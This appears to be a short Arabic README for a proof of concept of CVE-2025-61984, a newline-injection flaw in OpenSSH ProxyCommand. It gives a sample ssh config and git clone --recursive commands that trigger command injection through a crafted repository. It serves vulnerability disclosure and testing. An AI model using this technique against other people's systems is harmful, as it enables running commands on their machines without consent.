
إثبات مفهوم يوضح ثغرة حقن أسطر جديدة في OpenSSH ProxyCommand (CVE-2025-61984)، مما يسمح بحقن أوامر عبر إعداد SSH مُصمم خصيصًا.
هذا إثبات مفهوم يستخدم سطرًا جديدًا لإرباك ProxyCommand في OpenSSH <10.1. الشرح الكامل.
قم بإعداد ملف .ssh/config يحتوي على:
Host *.example.com
ProxyCommand some-command %r@%h:%p
(الأمر لا يهم، فقط يحتاج إلى %r غير مقتبس في الوسائط في مكان ما.)
ثم قم بتشغيل (لـ bash):
$ git clone --recursive https://github.com/dgl/cve-2025-61984-poc
أو إذا كنت تستخدم fish كـ $SHELL:
git clone --recursive -b fish https://github.com/dgl/cve-2025-61984-poc
إذا كنت لا تستخدم الصدفة ولكنك تريد اختبار هذا، يمكنك القيام بما يلي:
$ SHELL=/bin/bash git clone --recursive https://github.com/dgl/cve-2025-61984-poc